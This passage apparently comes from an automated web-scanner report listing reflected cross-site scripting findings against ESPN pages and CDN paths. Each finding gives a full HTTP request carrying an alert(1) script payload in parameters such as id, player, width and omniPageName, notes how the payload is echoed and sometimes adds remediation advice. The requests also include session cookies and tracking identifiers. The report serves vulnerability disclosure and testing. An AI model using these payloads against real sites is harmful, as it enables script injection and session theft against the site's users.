userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2858
The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload dfe78</script><script>alert(1)</script>983380015ec was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897dfe78</script><script>alert(1)</script>983380015ec&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:26:27 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2752
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2710
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2620
The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2910
The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3132
The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:34 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3022
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3106
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b83e1<script>alert(1)</script>d5ce256c82c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:27 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9679<script>alert(1)</script>3c99b6ca0a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:32 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bdc<script>alert(1)</script>182530dbb64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
